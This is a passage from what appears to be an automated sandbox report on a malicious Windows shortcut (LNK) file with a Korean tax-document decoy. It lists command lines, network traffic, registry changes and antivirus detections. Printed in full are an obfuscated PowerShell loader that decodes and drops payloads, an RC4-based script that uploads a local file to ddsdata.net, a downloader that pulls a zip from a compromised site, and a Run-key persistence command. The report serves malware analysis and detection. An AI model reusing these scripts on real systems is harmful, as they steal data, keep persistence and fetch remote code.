gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#> $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unspillable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-object <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocoria#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifiers gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; return <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#>-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBuY.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceritic earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#disentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAahtou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend elvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centunculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKeytyGN;&<#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <#acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch seamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen#> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x00006AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#semirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perruche esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt printmaker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheobronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenced shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype sciuroid#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zaptiahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM; |
| cmdline | powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_down.txt';$fp='C:\Users\Public\Documents\down.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}" |
| cmdline | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f |
| cmdline | powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcBytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encBytes = New-Object byte[] $srcBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encBytes[$n] = $srcBytes[$n] -bxor $s[$t];}$encString = [System.Convert]::ToBase64String($encBytes);return $encString;}$url1 = 'https://aufildeseaux.com/wp-admin/includes/main/read/get.php?pw=xlse&cm=ns0010';$outfile = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web'; $key=(Get-Date).Ticks.ToString(); $qryStr = $url1.Split('?')[1]; $encoded = ES113 -src1205 $qryStr -Key $key;$url1=$url1.Split('?')[0]+'?'+$key+'='+[System.Web.HttpUtility]::UrlEncode($encoded);iwr -Uri $url1 -OutFile $outfile;" |
| Data received | HTTP/1.1 100 Continue |
| Data received | HTTP/1.1 200 OK Date: Thu, 14 Dec 2023 02:04:55 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 |
| Data received | HTTP/1.1 200 OK Date: Thu, 14 Dec 2023 02:05:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 |
| Data sent | POST /upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: ddsdata.net Content-Length: 52 Expect: 100-continue Connection: Keep-Alive |
| Data sent | fn=IivVBqGZQkZ4oRP8Dhlh6mYJ&fd=&r=638381690885336250 |
| Data sent | fn=8gW7GmDGMrlV6LvzsaDcKQPO&fd=&r=638381691131898750 |
| description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
| description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
| description | (no description) | rule | DebuggerHiding__Thread | ||||||
| description | (no description) | rule | DebuggerHiding__Active | ||||||
| description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
| description | (no description) | rule | ThreadControl__Context | ||||||
| description | (no description) | rule | SEH__vectored | ||||||
| description | Checks if being debugged | rule | anti_dbg | ||||||
| description | Bypass DEP | rule | disable_dep | ||||||
| cmdline | "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);^<#letch overnegligently transactinide#^> $jpgrvGKusY=New-Object ^<#tornese ungospelized nondesignate#^>System.IO.FileStream($vOiCAahtou,^<#uncross traceless bonita#^>[System.IO.FileMode]::Open,^<#spasmotin aborigine panzootic#^>[System.IO.FileAccess]::Read);^<#wariangle aristolochiaceous fictioneering#^> $jpgrvGKusY.Seek($YTMhzLrhzIPV,^<#quipsomeness stercoral undeceptitious#^>[System.IO.SeekOrigin]::Begin);^<#marchantia oversoar duplicature#^> $VJOInKKXMRvQ=New-Object ^<#limnobium benzoic reefed#^>byte[] $ODtndleakm;^<#refries syndeses vermifugous#^> $jpgrvGKusY.Read($VJOInKKXMRvQ,^<#nonexemption preinitiated untruced#^>0,$ODtndleakm);^<#hematocytozoon commensalistic congregationalism#^> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc ^<#cavallas vapidness trabecule#^> $fNjGFHMrbWA ^<#semirigorously harmoniphone oxalated#^> $VJOInKKXMRvQ -Encoding ^<#irrefrangible rivalries dumontite#^> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);^<#rezbanyite orth gavelling#^> $KzOQvdcXYdjO=Get-ChildItem ^<#enheritage dialogite gorgonizing#^>-Path ^<#haemorrhagic aftershafted transplantar#^> $sBDFnkRezJN -Recurse ^<#preestimating arrivistes perfectionator#^>*.lnk ^<#unspillable thiobacteriales inverts#^>^| ^<#colliculate unwitch unmeekness#^>where-object ^<#apophyeeal oculauditory dackered#^>{$_.length ^<#cannonry resoluble diplocoria#^>-eq 0x042D9905} ^<#reendow unvoyaging engrossed#^>^| Select-Object ^<#certifiers gelechiid azeotrope#^>-ExpandProperty ^<#tabors lonhyn halavahs#^>FullName; return ^<#busybodyism cabrito sweepier#^> $KzOQvdcXYdjO;^<#pueblos pimas lutheran#^>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ ^<#muniments cryoconite cruets#^>-sBDFnkRezJN ^<#excludability hemen assassinative#^> $bKACpSJxmuLd;if($ofHLTkfBuY.length^<#bebite cesspits backstops#^> -eq 0){$ofHLTkfBuY=hwqBULFNvJ ^<#proceritic earned nondisturbing#^> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path ^<#disentrancement bomble dobule#^> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) ^<#jumma nonsensualistic grade#^>+ '';BYPVVObtSBg -vOiCAahtou ^<#homaxonic standbys gunbuilder#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#counterbend elvan chihuahua#^> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr ^<#cheselip centunculus hyperadipose#^> 0x10 -fNjGFHMrbWA ^<#pseudangina reemerge minchah#^> $lBLKeytyGN;^&^<#physis manipulated cauli#^> $lBLKeytyGN;$jsdoulrAkk=$env:public ^<#acuter orphrey remastication#^>+ '\' ^<#pest hazers jaspidean#^>+^<#anthryl koch seamy#^> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou ^<#seriating unrestrictedly huntsmen#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#hyperendocrinia inconsequence flandowser#^> 0x00006AB4 -ODtndleakm ^<#anilopyrin chondrodite dackers#^> 0x00013AA1 -MqCNDxmeLr ^<#semirebelliousness concretions uncolonizing#^> 0x20 -fNjGFHMrbWA ^<#wampuses perruche esotericist#^> $jsdoulrAkk;Remove-Item -Path ^<#unveritable scuttlebutt printmaker#^> $ofHLTkfBuY -Force;expand $jsdoulrAkk ^<#uncompliantly polemics tracheobronchitis#^> -F:* ^<#autogenously dhyana yus#^> ($env:public ^<#perorative influenced shader#^>+^<#cisjurane limericks unbeholden#^> '\' ^<#subpenaing varitype sciuroid#^>+^<#broomrape uncoloredly glandlike#^> 'documents');remove-item ^<#rimous zaptiahs cougher#^> -path ^<#strumectomy hoecake etherish#^> $jsdoulrAkk ^<#dwindlement periclasite pelargonidin#^>-force;$NjVWyNaCkCJM=$env:public^<#larcher rascalship slough#^>+'\documents\start.vbs';^&^<#paradisea parser diapaused#^> $NjVWyNaCkCJM; |
| cmdline | powershell -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross traceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[System.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgrvGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.SeekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#> $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtndleakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#enheritage dialogite gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#> $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unspillable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-object <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocoria#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifiers gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; return <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#>-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBuY.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceritic earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#disentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAahtou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend elvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centunculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKeytyGN;&<#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <#acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch seamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen#> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x00006AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#semirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perruche esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt printmaker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheobronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenced shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype sciuroid#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zaptiahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM; |
| cmdline | systeminfo |
| cmdline | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f |
| reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svchostno2 | reg_value | C:\Users\Public\Documents\start.vbs | ||||||
| count | 868 | name | heapspray | process | powershell.exe | total_mb | 54 | length | 65536 | protection | PAGE_READWRITE | ||||||||||||||||||
| ALYac | Trojan.Agent.LNK.Gen |
| Symantec | CL.Downloader!gen20 |
| Avast | LNK:Agent-HS [Trj] |
| Kaspersky | HEUR:Trojan.Multi.Powenot.a |
| Sophos | Mal/PowLnkObf-D |
| SentinelOne | Static AI - Suspicious LNK |
| Detected | |
| Kingsoft | Script.Troj.BigLnk.22142 |
| ZoneAlarm | HEUR:Trojan.Multi.Powenot.a |
| VBA32 | Trojan.Link.Crafted |
| AVG | LNK:Agent-HS [Trj] |
| parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Local\Temp\미신고 자금출처명세서(부가가치세법 시행규칙).hwp | ||||||
| parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\미신고 자금출처명세서(부가가치세법 시행규칙).hwp" | ||||||
| parent_process | powershell.exe | martian_process | "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs" | ||||||
| parent_process | powershell.exe | martian_process | "C:\Windows\system32\expand.exe" C:\Users\Public\vOiCAa.cab -F:* C:\Users\Public\documents | ||||||
| file | 18af887704f996f5_25711309.bat |
| option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
| file | C:\Windows\System32\ie4uinit.exe |
| file | C:\Program Files\Windows Sidebar\sidebar.exe |
| file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
| file | C:\Windows\System32\xpsrchvw.exe |
| file | C:\Windows\System32\displayswitch.exe |
| file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
| file | C:\Windows\System32\mblctr.exe |
| file | C:\Windows\System32\mstsc.exe |
| file | C:\Windows\System32\SnippingTool.exe |
| file | C:\Windows\System32\SoundRecorder.exe |
| file | C:\Windows\System32\dfrgui.exe |
| file | C:\Windows\System32\msinfo32.exe |
| file | C:\Windows\System32\rstrui.exe |
| file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
| file | C:\Program Files\Windows Journal\Journal.exe |
| file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| file | C:\Windows\System32\MdSched.exe |
| file | C:\Windows\System32\msconfig.exe |
| file | C:\Windows\System32\recdisc.exe |
| file | C:\Windows\System32\msra.exe |
| file | C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe |
| file | C:\Windows\System32\expand.exe |
| file | C:\Windows\SysWOW64\wscript.exe |